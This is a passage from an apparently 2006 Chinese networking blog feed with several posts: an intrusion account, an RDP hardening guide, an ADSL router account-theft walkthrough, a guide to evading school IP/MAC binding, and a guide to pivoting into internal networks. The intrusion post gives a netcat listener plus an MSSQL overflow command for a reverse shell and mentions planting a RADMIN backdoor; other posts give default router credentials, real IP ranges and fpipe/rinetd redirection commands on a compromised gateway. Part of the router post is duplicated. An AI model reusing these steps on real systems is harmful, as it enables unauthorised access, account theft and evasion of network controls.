/>现在我们再请出SUPPERSCAN对218。xxx.xxx.xxx进行扫描，呵，看到没有？扫描结果已经不同了，开放的端口是139 1433等，刚才只是开放了80 23 21 而已（也就是说我们的映射已经成功了）该是X-SCAN出手了，用它来扫弱口令最好不过了，但扫描的结果令人失望，一个弱口令也没有，看来管理员还不算低B啊 </p><p><br />四。溢出 </p><p><br />既然没有弱口令，也没开80，那只好从逸出方面着手了，但没开80 21 也就webdav .sevr-u的溢出没戏了，很自然，我向导了RPC溢出，但实践证明RPC溢出也是不行的，LSASS溢出也不行 </p><p><br />五。募然回首，那人却在，灯火阑珊处 </p><p><br />开来这管理员还是比较负责的，该打的补丁都打上了，这时侯，我的目光转移到1433上了（嘿，不知道他打了SQL补丁没有？，心动不如行动，现在只好死马当活马医了，于是 </p><p>nc -v -l 99 </p><p>sql2 218.xxx.xxx.xxx 0 218.xxx.xxx.xxx 99 </p><p>bingle 成功地得到一个shell了 </p><p><br />六。设置后门 </p><p><br />到这里，我们的入侵已经成功了，余下的是扫尾留后门，至于后门，我一般都是用FTP上传RADMIN上去的，呵呵，这里不详谈了，相信各位都知道。</p><img src ="http://www.cnitblog.com/zhangyafei/aggbug/21372.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/zhangyafei/" target="_blank">网工地带</a> 2006-12-31 20:14 <a href="http://www.cnitblog.com/zhangyafei/archive/2006/12/31/21372.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>使用IP策略阻止3389非法访问</title><link>http://www.cnitblog.com/zhangyafei/archive/2006/12/29/21262.html</link><dc:creator>网工地带</dc:creator><author>网工地带</author><pubDate>Thu, 28 Dec 2006 21:07:00 GMT</pubDate><guid>http://www.cnitblog.com/zhangyafei/archive/2006/12/29/21262.html</guid><wfw:comment>http://www.cnitblog.com/zhangyafei/comments/21262.html</wfw:comment><comments>http://www.cnitblog.com/zhangyafei/archive/2006/12/29/21262.html#Feedback</comments><slash:comments>3</slash:comments><wfw:commentRss>http://www.cnitblog.com/zhangyafei/comments/commentRss/21262.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/zhangyafei/services/trackbacks/21262.html</trackback:ping><description><![CDATA[2000的终端服务是一个无论在速度还是在易操作性上都是非常出色的远程管理,也是因为它的这些优点,基于对它默认使用的3389端口的攻击和扫描,是愈来愈多,非法入侵者通过3389进入后,会完全控制您的主机,或是利用此主机作为远程转移攻击平台,给您给别人都带来了不小的麻烦.<br /><br />    我们大家现在都已经认识到这一点,开始着手3389的安全防护,比如:给系统装上最新的SP,删除系统输入法帮助,更改默认的3389端口,将终端服务RDP协议绑定在需要连接的介面卡上等等方法,但这些也会有不足的地方,能否可以进一步的保证3389的安全性呢?回答是肯定的.我们可以使用2000的IP安全策略来加强3389的防护.<br /><br />    思路是这样:我们在主机过滤大部分远程连接本地3389端口的TCP请求,仅仅允许通过我们指定的授权IP连接(管理员所使用的工作站地址),下面我们来看看如何实现.(我第一次使用时,感觉挺复杂的,呵呵~ 我笨,但了解后就感觉好了,希望您第一次要耐着性子尝试一下,对以后在安全管理系统上会有帮助!)<br /><br />    首先,打开"管理工具"中的"本地安全策略",在"IP安全策略"选项上点击右键,如图1:<br /><img src="http://www.chinahonker.com/upfiles/2005/ipsec-1.jpg" /><p>    选择"创建IP安全策略",会弹出向导窗口,单击下一步,在弹出的窗口中,输入此策略的名称,比如这里我们键入"3389过滤"再单击下一步,以后全部默认下一步,其中有一个警告,单击"是"即可这样就完成新策略的添加.如图2:<br /><img src="http://www.chinahonker.com/upfiles/2005/ipsec-2.jpg" /></p><p>   点击确定后,回到图1界面,选择"管理IP筛选器操作",弹出窗口,如图3<br /><img src="http://www.chinahonker.com/upfiles/2005/ipsec-3.jpg" /></p><p>    我们先要建立一个筛选器,单击"添加",弹出窗口,在筛选器名称里填入"3389筛选器1",再单击旁边的"添加",会弹出向导窗口,单击"下一步",会出现源地址选项,(你可以按照自己的需要选择),在这里我们选择"任何IP地址",单击下一步,在目的地址中选择"我的IP地址",再单击下一步,选择IP协议,这里我们选择TCP,单击下一步,会出现端口选择,如图4:<br /><img src="http://www.chinahonker.com/upfiles/2005/ipsec-4.jpg" /><br /><br />4</p><p>  我们设置从任何端口到本机的3389端口.单击下一步.就完成了筛选器的建立.如图5:<br /><br /><img src="http://www.chinahonker.com/upfiles/2005/ipsec-5.jpg" /></p><p>5</p><p>    接着回到图3界面,单击"管理筛选器操作"页栏,单击"添加",会弹出筛选器操作向导,单击"下一步",取名为"阻止3389",单击下一步,<br />在选择操作页面中选择"阻止",单击"下一步",就完成了筛选器的建立.如图6:</p><p><img src="http://www.chinahonker.com/upfiles/2005/ipsec-6.jpg" /></p><p>6</p><p>   好了! 我们建立了筛选器和筛选器操作,现在就要建立IP安全规则了.(***)在图1界面中,双击我们刚刚建立的"3389过滤"策略,弹出策略属性窗口,然后单击"添加"弹出向导,单击"下一步",一直单击下一步,其中一个选择"是",直到这里,如图7:<br /><img src="http://www.chinahonker.com/upfiles/2005/ipsec-7.jpg" /></p><p>7</p><p>    这时,我们要选择我们刚才建立的"3389筛选器1",然后再单击下一步.如图8:(大家注意到没有,傍边的"添加""编辑"等按钮,其实我们可以在此向导中就可以一次完成建立筛选器及筛选器操作等工作)图8<br /><img src="http://www.chinahonker.com/upfiles/2005/ipsec-8.jpg" /></p><p>8</p><p>    我们选择建立的"阻止3389"的操作,单击"下一步",就完成了安全规则的建立.<br /><br />现在我们就已经有了一个基于在3389端口阻止所有IP连接的安全策略了.现在,你在图1的界面上,在"3389过滤"策略上单击右键,再单击"指派",这样,系统就开始应用安全策略了.所有连接3389的TCP请求都将被阻止.<br /><br />现在所有的连接都被阻止了,管理员如何连接呢? 别急我们再来建立一个允许管理员登陆的策略.<br /><br />    我们回到图3的界面,重复建立筛选器的步骤,建立一个名为"3389筛选器2"的筛选器,别的设置和"3389筛选器1"的一样,只是在选择源地址时要选择"一个特定的IP地址",这里比如我的管理员工作站IP是192.168.0.2,如图9:<br /><img src="http://www.chinahonker.com/upfiles/2005/ipsec-9.jpg" /></p><p>9</p><p>    然后再重复建立筛选器操作的步骤,建立一个名为"允许3389"的操作,和上面不同的是在选择动作时使用"许可".<br /><br />    再回到上面的(***)的地方,重复建立规则的步骤,用"3389筛选器2"和"允许3389"建立一个新的规则,完成后在策略"3389过滤"属性中显示如下:如图10:<br /><img src="http://www.chinahonker.com/upfiles/2005/ipsec-10.jpg" /></p><p><br />10</p><p>    至此,我们已经完成了在3389端口上的IP策略!此时,只有来自192.168.0.2的IP地址将被许可连接,其他的IP地址通讯都将被阻塞.(IP策略需要指派后才可生效,不需要重起,在更改设置时也不用停止后再指派.指派相应的IP策略后,此IP策略名上有个小绿点)<br /><br />**********************************************<br />关于动态IP连接的问题<br /><br />    对于拨号上网或动态IP地址的管理员,我想应该可以在允许连接源地址中选择"一个特定的子网"来实现.我没有环境,所以测试不了.只有猜了.见谅!<br /><br />    另外,是不是可以尝试使用一下第三方工具,如winrouter.设置它关掉任何对3389的连接,当管理员需要连接3389时,使用本地winrouter远程控制服务器winrouter打开对自己当前IP的允许连接,就可以上3389了.管理完毕后,再将3389关掉,也可以从一定程度上加强系统安全.<br />**********************************************<br /></p><img src ="http://www.cnitblog.com/zhangyafei/aggbug/21262.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/zhangyafei/" target="_blank">网工地带</a> 2006-12-29 05:07 <a href="http://www.cnitblog.com/zhangyafei/archive/2006/12/29/21262.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>ADSL远程盗号竟如此简单</title><link>http://www.cnitblog.com/zhangyafei/archive/2006/12/29/21259.html</link><dc:creator>网工地带</dc:creator><author>网工地带</author><pubDate>Thu, 28 Dec 2006 20:50:00 GMT</pubDate><guid>http://www.cnitblog.com/zhangyafei/archive/2006/12/29/21259.html</guid><wfw:comment>http://www.cnitblog.com/zhangyafei/comments/21259.html</wfw:comment><comments>http://www.cnitblog.com/zhangyafei/archive/2006/12/29/21259.html#Feedback</comments><slash:comments>7</slash:comments><wfw:commentRss>http://www.cnitblog.com/zhangyafei/comments/commentRss/21259.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/zhangyafei/services/trackbacks/21259.html</trackback:ping><description><![CDATA[
		<p style="TEXT-INDENT: 2em">
				<b>
						<font size="2">1.密码被盗 ADSL路由拨号惹的祸</font>
				</b>
		</p>
		<p style="TEXT-INDENT: 2em">
				<font size="2">
				</font>
		</p>
		<p style="TEXT-INDENT: 2em">
				<font size="2">本文中揭露了黑客攻击ADSL用户，窃取用户名密码的常见方法，读者请勿将其用于不法用途，并提醒所有与此漏洞相关的用户尽快采取措施进行防范。</font>
		</p>
		<p style="TEXT-INDENT: 2em">
				<font size="2">ADSL作为一种宽带接入方式已经被广大用户接受，现在一些用户家里有很多台电脑，通过一台ADSL路由器拨号上网，这样充分利用了带宽，对于家中有多台电脑需共享上网的用户来说，一般可通过建立和配置代理服务器来实现共享上网，缺点是主机必须开着才能实现共享；另外一种有效的方法是使用路由器来实现共享，这样每个客户端都能独立上网，不足之处是要添置昂贵的路由设备。其实有些ADSL MODEM本身就带有路由功能，只要用户能够正确配置相关参数就可以路由共享，根本不需要外添设备。</font>
		</p>
		<p style="TEXT-INDENT: 2em">
				<font size="2">国内ADSL服务提供商所提供的调制解调器大部分都内置了路由功能，不过由于技术上的原因，少量ADSL调制解调器虽然在硬件上设计了路由功能，但调制解调器随机软件并不能支持在PPPoE虚拟拨号接入方式下使用该功能，只有拥有固定IP地址的专线用户才可以使用路由功能，或者需要服务商局端设备同为该品牌的产品才能够支持在PPPoE接入方式下使用，这时需要升级调制解调器的软件后才可以使用内置的路由功能。不同路由器的配置方法不同，这类主题的帖子网上有很多，我们在这里主要介绍那些使用路由拨号上网的用户，需要注意的安全问题。</font>
		</p>
		<p style="TEXT-INDENT: 2em">
				<font size="2">最常见的安全问题就是用户没有修改路由器的配置密码，一般的路由器在出场的时候夺回有一个默认的配置密码。只有知道这个密码，用户才能对路由器的进行配置。很多用户在配置自己的路由器之后，并没有修改这个密码。导致网上一些不法之徒可以控制路由器，从而盗窃用户的ADSL账号。这些不法之徒是如何做的呢，我们下面来把他们的手法一一曝光。</font>
		</p>
		<p style="TEXT-INDENT: 2em">
				<b>
						<font size="2">2.扫描ADSL在线用户 寻找攻击目标</font>
				</b>
		</p>
		<p style="TEXT-INDENT: 2em">
				<font size="2">扫描ADSL上网用户的IP段，获取开放80端口的主机列表</font>
		</p>
		<p style="TEXT-INDENT: 2em">
				<font size="2">这些用户首先拨通自己家的ADSL，然后用ipconfig命令查看自己的Ip，如下图所示：</font>
		</p>
		<p style="TEXT-INDENT: 2em">
				<font size="2">在开始－&gt;运行－&gt;输入cmd，在出现的dos窗口中输入ipconfig即可看到：</font>
		</p>
		<p style="TEXT-INDENT: 2em">
				<font size="2">
				</font>
		</p>
		<p style="TEXT-INDENT: 2em">
				<font size="2">
				</font>
		</p>
		<center>
				<font size="2">
						<img src="http://www.juntuan.net/d/file/hkjc/xinshou/2005-07-30/0c5bbe94719d9efe9fc1a025a1f081a0.gif" onload="return imgzoom(this,550)" border="0" />
						<br />
						<font face="宋体">一般北京的ADSL上网的用户多为61.49.*.*。获得了自己的IP段之后，就可以找一个好的端口扫描工具了。新在端口扫描工具有很多，其中支持多线程、体积小、速度快的首推superscan。我们这里就使用它作为示范工具。Superscan的界面如下：<font size="3"></font></font>
						<p>
						</p>
						<p>
								<font face="宋体" size="3">
								</font>
						</p>
						<p style="TEXT-INDENT: 2em">
								<font face="宋体" size="3">
								</font>
						</p>
						<p style="TEXT-INDENT: 2em">
								<font face="宋体" size="3">
								</font>
						</p>
						<center>
								<font face="宋体" size="3">
										<img src="http://www.juntuan.net/d/file/hkjc/xinshou/2005-07-30/855eca6ae0be720c4b8775a54b7dd069.jpg" onload="return imgzoom(this,550)" border="0" />
								</font>
						</center>
						<p>
								<font face="宋体" size="3">
								</font>
						</p>
						<p style="TEXT-INDENT: 2em">
								<font face="宋体" size="3">
								</font>
						</p>
						<p style="TEXT-INDENT: 2em">
								<font size="2">一般我们在开始地址处输入自己的IP段首地址，即61.49.*.1，结束IP地址会自动显示出61.49.*.254，这里需要说明的是，旁边那个ping,以及connect数据需要根据自己的情况输入，对于本网段的IP，即IP地址前3部分与自己的IP地址相同的IP，在扫描的时候可以把这些数据设置的短小一些，而对于其他网段的地址，一般需要设置的大一点。具体情况根据扫描结果而定，如果输入的数据太小，扫描之后会找不到计算机。</font>
						</p>
						<p style="TEXT-INDENT: 2em">
								<font size="2">下面需要设置一下扫描端口，我们在探测路由器的时候只需要扫描80端口即可。所以单击窗体右上的配置列表，会出现如下窗体：</font>
						</p>
						<p style="TEXT-INDENT: 2em">
								<font size="2">
								</font>
						</p>
						<p style="TEXT-INDENT: 2em">
								<font size="2">
								</font>
						</p>
						<center>
								<font size="2">
										<img src="http://www.juntuan.net/d/file/hkjc/xinshou/2005-07-30/5393dc0de3fca9e7e6fadc088073ed48.jpg" onload="return imgzoom(this,550)" border="0" />
								</font>
						</center>
						<p>
								<font size="2">
								</font>
						</p>
						<p style="TEXT-INDENT: 2em">
								<font size="2">
								</font>
						</p>
						<p style="TEXT-INDENT: 2em">
								<font size="2">修改select ports如图所示，去掉所有其他端口前的绿钩，（单击该端口即可）最终只保留80端口，然后单击save，把端口配置表保存到硬盘上，以后每次使用superscan的时候就不再需要从新配置，只需要load即可。</font>
						</p>
						<p style="TEXT-INDENT: 2em">
								<font size="2">全部设置好之后，单击start进行扫描。扫描结束之后，如图所示：</font>
						</p>
						<p style="TEXT-INDENT: 2em">
								<font size="2">
								</font>
						</p>
						<p style="TEXT-INDENT: 2em">
								<font size="2">
								</font>
						</p>
						<center>
								<font size="2">
										<font face="宋体">我们可以看到这个网段有两台机器打开了80端口，单击这两台机器左边的小＋号图标，可以显示这两台机器所开发的端口信息。61.49.150.68这台机器开放的是一个IIS的服务器，61.49.150.85这台机器开的是一个302标志，根据经验，我们可以知道这里开放的是一个中兴系列的路由器配置接口。本篇文章我们主要介绍ADSL路由器的安全隐患，IIS的安全性问题我们在后面的文章再介绍，这里我们只需在61.49.150.85上单击右键，选择web方式浏览即可。 </font>
										<p>
										</p>
										<p style="TEXT-INDENT: 2em">
												<b>
														<font size="2">3.点击鼠标轻松破解密码 防范意识需加强</font>
												</b>
										</p>
										<p style="TEXT-INDENT: 2em">
												<font size="2">
												</font>
										</p>
										<p style="TEXT-INDENT: 2em">
												<font size="2">
												</font>
										</p>
										<center>
												<font size="2">
														<img src="http://www.juntuan.net/d/file/hkjc/xinshou/2005-07-30/6698cb5bf93fbb8a88bff649314a6ea4.gif" onload="return imgzoom(this,550)" border="0" />
												</font>
										</center>
										<p>
												<font size="2">
												</font>
										</p>
										<p style="TEXT-INDENT: 2em">
												<font size="2">
												</font>
										</p>
										<p style="TEXT-INDENT: 2em">
												<font size="2">单击之后会出现一个连接配置对话框，如图所示：</font>
										</p>
										<p style="TEXT-INDENT: 2em">
												<font size="2">
												</font>
										</p>
										<p style="TEXT-INDENT: 2em">
												<font size="2">
												</font>
										</p>
										<center>
												<font size="2">
														<img src="http://www.juntuan.net/d/file/hkjc/xinshou/2005-07-30/b0a9fbab905457474dcacb553df24eb2.gif" onload="return imgzoom(this,550)" border="0" />
												</font>
										</center>
										<p>
												<font size="2">
												</font>
										</p>
										<p style="TEXT-INDENT: 2em">
												<font size="2">
												</font>
										</p>
										<p style="TEXT-INDENT: 2em">
												<font size="2">点击OK，就可以连接了。连接之后弹出的提示框如图所示：</font>
										</p>
										<p style="TEXT-INDENT: 2em">
												<font size="2">
												</font>
										</p>
										<p style="TEXT-INDENT: 2em">
												<font size="2">
												</font>
										</p>
										<center>
												<font size="2">
														<img src="http://www.juntuan.net/d/file/hkjc/xinshou/2005-07-30/c9c2607ed669e09ad36d364ed322d710.gif" onload="return imgzoom(this,550)" border="0" />
												</font>
										</center>
										<p>
												<font size="2">
												</font>
										</p>
										<p style="TEXT-INDENT: 2em">
												<font size="2">
												</font>
										</p>
										<p style="TEXT-INDENT: 2em">
												<font size="2">通过刚才连接页上的标志，我们可以肯定这是一台中兴831路由器，输入出厂默认的用户名、密码：ZXDSL、ZXDSL，就进入了配置界面：</font>
										</p>
										<p style="TEXT-INDENT: 2em">
												<font size="2">
												</font>
										</p>
										<p style="TEXT-INDENT: 2em">
												<font size="2">
												</font>
										</p>
										<center>
												<font size="2">
														<img src="http://www.juntuan.net/d/file/hkjc/xinshou/2005-07-30/29f50da128a2ad253f3a7f89b79d0904.jpg" onload="return imgzoom(this,550)" border="0" />
												</font>
												<img src="http://www.juntuan.net/d/file/hkjc/xinshou/2005-07-30/a3cd9011ee37c5c893848b7591e89f67.jpg" onload="return imgzoom(this,550)" border="0" />
												<br />
												<font face="宋体">我们可以看到这个网段有两台机器打开了80端口，单击这两台机器左边的小＋号图标，可以显示这两台机器所开发的端口信息。61.49.150.68这台机器开放的是一个IIS的服务器，61.49.150.85这台机器开的是一个302标志，根据经验，我们可以知道这里开放的是一个中兴系列的路由器配置接口。本篇文章我们主要介绍ADSL路由器的安全隐患，IIS的安全性问题我们在后面的文章再介绍，这里我们只需在61.49.150.85上单击右键，选择web方式浏览即可。 </font>
												<p>
												</p>
												<p style="TEXT-INDENT: 2em">
														<b>
																<font size="2">3.点击鼠标轻松破解密码 防范意识需加强</font>
														</b>
												</p>
												<p style="TEXT-INDENT: 2em">
														<font size="2">
														</font>
												</p>
												<p style="TEXT-INDENT: 2em">
														<font size="2">
														</font>
												</p>
												<center>
														<font size="2">
																<img src="http://www.juntuan.net/d/file/hkjc/xinshou/2005-07-30/6698cb5bf93fbb8a88bff649314a6ea4.gif" onload="return imgzoom(this,550)" border="0" />
														</font>
												</center>
												<p>
														<font size="2">
														</font>
												</p>
												<p style="TEXT-INDENT: 2em">
														<font size="2">
														</font>
												</p>
												<p style="TEXT-INDENT: 2em">
														<font size="2">单击之后会出现一个连接配置对话框，如图所示：</font>
												</p>
												<p style="TEXT-INDENT: 2em">
														<font size="2">
														</font>
												</p>
												<p style="TEXT-INDENT: 2em">
														<font size="2">
														</font>
												</p>
												<center>
														<font size="2">
																<img src="http://www.juntuan.net/d/file/hkjc/xinshou/2005-07-30/b0a9fbab905457474dcacb553df24eb2.gif" onload="return imgzoom(this,550)" border="0" />
														</font>
												</center>
												<p>
														<font size="2">
														</font>
												</p>
												<p style="TEXT-INDENT: 2em">
														<font size="2">
														</font>
												</p>
												<p style="TEXT-INDENT: 2em">
														<font size="2">点击OK，就可以连接了。连接之后弹出的提示框如图所示：</font>
												</p>
												<p style="TEXT-INDENT: 2em">
														<font size="2">
														</font>
												</p>
												<p style="TEXT-INDENT: 2em">
														<font size="2">
														</font>
												</p>
												<center>
														<font size="2">
																<img src="http://www.juntuan.net/d/file/hkjc/xinshou/2005-07-30/c9c2607ed669e09ad36d364ed322d710.gif" onload="return imgzoom(this,550)" border="0" />
														</font>
												</center>
												<p>
														<font size="2">
														</font>
												</p>
												<p style="TEXT-INDENT: 2em">
														<font size="2">
														</font>
												</p>
												<p style="TEXT-INDENT: 2em">
														<font size="2">通过刚才连接页上的标志，我们可以肯定这是一台中兴831路由器，输入出厂默认的用户名、密码：ZXDSL、ZXDSL，就进入了配置界面：</font>
												</p>
												<p style="TEXT-INDENT: 2em">
														<font size="2">
														</font>
												</p>
												<p style="TEXT-INDENT: 2em">
														<font size="2">
														</font>
												</p>
												<center>
														<font size="2">
																<img src="http://www.juntuan.net/d/file/hkjc/xinshou/2005-07-30/29f50da128a2ad253f3a7f89b79d0904.jpg" onload="return imgzoom(this,550)" border="0" />
																<br />
														</font>
														<font face="宋体" size="3"> </font>
														<p style="TEXT-INDENT: 2em">
																<font size="2">点击导航栏上的“quick configuration”就进入了快速配置界面，如图所示：</font>
														</p>
														<p style="TEXT-INDENT: 2em">
																<font size="2">
																</font>
														</p>
														<p style="TEXT-INDENT: 2em">
																<font size="2">
																</font>
														</p>
														<center>
																<font size="2">
																		<img src="http://www.juntuan.net/d/file/hkjc/xinshou/2005-07-30/1e1d4799cd9933783adb61c826c22ee7.jpg" onload="return imgzoom(this,550)" border="0" />
																</font>
														</center>
														<p>
																<font size="2">
																</font>
														</p>
														<p style="TEXT-INDENT: 2em">
																<font size="2">
																</font>
														</p>
														<p style="TEXT-INDENT: 2em">
																<font size="2">用户名已经看到了，密码却显示为小黑点，这怎么办呢，其实也难不倒大家，单击右键，选择查看源代码：</font>
														</p>
														<p style="TEXT-INDENT: 2em">
																<font size="2">
																</font>
														</p>
														<p style="TEXT-INDENT: 2em">
																<font size="2">
																</font>
														</p>
														<center>
																<font size="2">
																		<img src="http://www.juntuan.net/d/file/hkjc/xinshou/2005-07-30/8edb6dfbdb44646d145fa2c50bffe043.gif" onload="return imgzoom(this,550)" border="0" />
																</font>
														</center>
														<p>
																<font size="2">
																</font>
														</p>
														<p style="TEXT-INDENT: 2em">
																<font size="2">至此一个ADSL账户就被轻易盗取了。</font>
														</p>
														<p style="TEXT-INDENT: 2em">
																<font size="2">其实补上这个漏洞的方法非常简单，只要用户在安装路由器的时候修改自己默认的密码即可了，但是很多人都没有去做这一步，为黑客留下了很多“靶子”。</font>
														</p>
														<p style="TEXT-INDENT: 2em">
																<font size="2">
																</font>
														</p>
														<p style="TEXT-INDENT: 2em">
																<font size="2">
																</font>
														</p>
														<center>
																<font size="2">
																		<img src="http://www.juntuan.net/d/file/hkjc/xinshou/2005-07-30/7da37d15c4487a4be40a344309cb7c2b.jpg" onload="return imgzoom(this,550)" border="0" />
																</font>
														</center>
														<p>
																<font size="2">
																</font>
														</p>
														<p style="TEXT-INDENT: 2em">
																<font size="2">
																</font>
														</p>
														<p style="TEXT-INDENT: 2em">
																<font size="2">我们把一些常见的路由器配置口令和IP地址公布一下，希望大家根据自己的路由器品牌进行甄别，修改默认的口令。需要说明的是，这些数据都不是什么机密，它们就印在产品的说明书上面，所以我们强烈建议路由方式上网的ADSL用户赶快修改你们的密码，不要为不法之徒留下犯罪的空间。 </font>
																<br />
														</p>
												</center>
										</center>
								</font>
						</center>
				</font>
		</center>
<img src ="http://www.cnitblog.com/zhangyafei/aggbug/21259.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/zhangyafei/" target="_blank">网工地带</a> 2006-12-29 04:50 <a href="http://www.cnitblog.com/zhangyafei/archive/2006/12/29/21259.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>解除上网限制 IP和MAC捆绑的破解</title><link>http://www.cnitblog.com/zhangyafei/archive/2006/12/28/21239.html</link><dc:creator>网工地带</dc:creator><author>网工地带</author><pubDate>Thu, 28 Dec 2006 11:52:00 GMT</pubDate><guid>http://www.cnitblog.com/zhangyafei/archive/2006/12/28/21239.html</guid><wfw:comment>http://www.cnitblog.com/zhangyafei/comments/21239.html</wfw:comment><comments>http://www.cnitblog.com/zhangyafei/archive/2006/12/28/21239.html#Feedback</comments><slash:comments>3</slash:comments><wfw:commentRss>http://www.cnitblog.com/zhangyafei/comments/commentRss/21239.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/zhangyafei/services/trackbacks/21239.html</trackback:ping><description><![CDATA[我们学校最近将MAC和IP进行了捆绑，又在服务器（Win2K）上进行了上网时间的限制，真是烦死人了，我想我可是一个从不受限制的人啊，怎么可以就这样束手就擒呢！古话说得好“上有政策，下有对策”，那我就来干掉它，说干就干。 
<p></p><p>原理如下： </p><p>MAC和IP捆绑是在服务器上，那么大家想想，作用范围应该是什么呢？当然也只有在服务器对客户机上了，但是如果我修改了客户机上的IP，那服务器上的怎样呢？如果你已经想到这了，那就已经理论的破解了捆绑了。 </p><p>步骤如下： </p><p>1、首先要探明IP的范围和被限制的IP的范围，若IP是172.16.xxx.xxx，MAC是52-54-AB-12-34-56，那么IP范围应该是在172.16.0.1——172.16.255.255，我想不太可能都捆绑完吧，否则你就只能等着die了。 </p><p>2、对172.16.0.1——172.16.255.255做一次完整的扫描，以防造成不必要的麻烦（IP冲突），引起网管的注意，那样就不管了。 </p><p>3、找到没有人使用的IP，从172.16.255.255往172.16.0.1找，因为一般的网管是从172.16.0.1开始使用的，后面的一般没有使用，突破口就在这儿了。 </p><p>4、在网上邻居-&gt;属性-&gt;TCP/IP属性固定刚才拿到的IP地址，95/98/ME请看第5步，2K、XP至此完成，打开IE试试吧，又飞翔在INTERNET上了。 </p><p>5、在95/98/ME系统上修改了IP，会提示重启，以防机器安装还原卡或类似的产品只能不重启，那就在我的电脑-&gt;属性-&gt;网卡-&gt;先禁用后再启用（需要等一会）-&gt;确定，现在打开IE试试，也已经可以了. </p><p>至此完成破解。 </p><p>解决方法： </p><p>安装ISA一类的代理服务软件进行管理，最安全的是划分VLAN，不过交换机得支持才行。</p><img src ="http://www.cnitblog.com/zhangyafei/aggbug/21239.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/zhangyafei/" target="_blank">网工地带</a> 2006-12-28 19:52 <a href="http://www.cnitblog.com/zhangyafei/archive/2006/12/28/21239.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>突破网关，利用端口重定向进入内网</title><link>http://www.cnitblog.com/zhangyafei/archive/2006/12/28/21238.html</link><dc:creator>网工地带</dc:creator><author>网工地带</author><pubDate>Thu, 28 Dec 2006 11:50:00 GMT</pubDate><guid>http://www.cnitblog.com/zhangyafei/archive/2006/12/28/21238.html</guid><wfw:comment>http://www.cnitblog.com/zhangyafei/comments/21238.html</wfw:comment><comments>http://www.cnitblog.com/zhangyafei/archive/2006/12/28/21238.html#Feedback</comments><slash:comments>2</slash:comments><wfw:commentRss>http://www.cnitblog.com/zhangyafei/comments/commentRss/21238.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/zhangyafei/services/trackbacks/21238.html</trackback:ping><description><![CDATA[经常有人问我这个问题“怎样进入内网”，怎么回答呢，归纳起来就是一句话“突破网关，利用端口重定向进入内网”。 
<p></p><p>首选要突破网关（GetWay），这很容易理解，因为一个内网要访问internet总是必然通过网关接入的，至于怎样突破网关，这和进入不是网关的服务器没有什么两样，就不说了。 </p><p>突破网关以后，我们的目标就是通过网关（IP为202.98.*.*）上网的192.168.21.75。以后的方法就是在网关力端口重定向，建立包转发。端口重定向分两种（local和remote），但是我们要进而内网，显然不能用local方式的重定向，local方式的重定向主要用来绕过_blank"&gt;防火墙（关于这个问题我将在随后单独写一篇文章来讨论怎样用端口重定向绕过_blank"&gt;防火墙）。 </p><p>一、利用Fpipe建立端口重定向。 <br />Fpipe是个非常有趣的东东。为了证明Fpipe的端口重定向功能，我们来做这样的试验。 <br />首先在自己的机器上运行Fpipe，如下： </p><p>E:\tool\FPip&gt;fpipe -l 80 -s 90 -r 80 202.98.177.162 <br />FPipe v2.1 - TCP/UDP port redirector. <br />Copyright 2000 (c) by Foundstone, Inc. <br />&lt;br&gt;http://www.foundstone.com </p><p>//解释一下这个命令 <br />fpipe -l 80 -s 90 -r 80 202.98.177.162 <br />将到本机80端口的连接通过90端口连接到202.98.177.162的80端口。 <br />一下是详细语法： <br />FPipe [-hv?] [-brs ] IP <br />-?/-h - shows this help text <br />-c - maximum number of allowed simultaneous connections. Default is 32 #连接的最大数目,默认是32 <br />-l - listening port number #要监听的TCP端口号 <br />-r - remote TCP port number #要定向到的IP主机的端口号 <br />-s - outbound connection source port number #从哪个端口发出重定向信息 <br />-v - verbose mode #详细显示过程 </p><p>在上面的过程中，我们在自己的机器上建立了端口重定向：将到本机80端口的连接通过90端口连接到202.98.177.162的80端口 <br />然后我们在浏览器中输入：&lt;br&gt;http://127.0.0.1，结果发现昆明高新区的网页打了，这说明我们的重定向成功。 <br />此时fpipe现实了如下的内容： <br />Pipe connected: <br />In: 127.0.0.1:2092 --&gt; 127.0.0.1:80 <br />Out: 192.168.168.112:90 --&gt; 202.98.177.162:80 </p><p>从上面的输出可以看出数据包经过的路径（192.168.168.112是我的IP） <br />好了成功以后，下面的东西我不说大家也知道了，将Fpipe拷贝到我们控制的网关上，执行重定向： <br />fpipe -l 81 -s 91 -r 21 192.168.21.75 #在网关（202.98.*.*）执行，将到202.98.*.*的81端口的数据通过91端口转发向192.168.21.75的21端口。同样的： <br />fpipe -l 82 -s 92 -r 23 192.168.21.75 #将到202.98.*.*的82端口的数据通过92端口转发向192.168.21.75的23端口 <br />fpipe -l 83 -s 93 -r 80 192.168.21.75 #将到202.98.*.*的83端口的数据通过93端口转发向192.168.21.75的80端口 <br />fpipe -l 84 -s 94 -r 139 192.168.21.75 #将到202.98.*.*的84端口的数据通过94端口转发向192.168.21.75的139端口 <br />下面的你更应该知道了： <br />如果你在本机telnet到202.98.*.*的81就等价于你telnet到192.168.21.75的21，不对啊！192.168.21.75的21应该FTP上去才对啊（哈哈），那就ftp到202.98.*.*的81端口吧！ </p><p>写到这里我也忍不住喊“真牛…………真牛…………” </p><p>二、利用rinetd建立重定向。 <br />方法和上面一样。在网关上运行rineted，不过要建立个配置文件（文件名和扩展名随意了在这里我以配置文件为conf.ini做例子说） <br />在本地用计事本建立如下内容的配置文件（其中的*不方便说，别找这写哦！他的意思是将到202.98.*.* 的90的包转发到192.168.21.75的80） <br />202.98.*.* 90 192.168.21.75 80 <br />将他存为conf.ini文件然后和rineted拷贝到那个网关上（202.98.*.* ），然后 <br />在网关上执行 <br />rinetd -c conf.ini <br />然后你连接到202.98.*.* 90和连接到192.168.21.75 80的效果是一样的。 </p><p>顺便说说rinetd配置文件的语法为 <br />bindaddress bindport connectaddress connectport </p><p>写在后面： <br 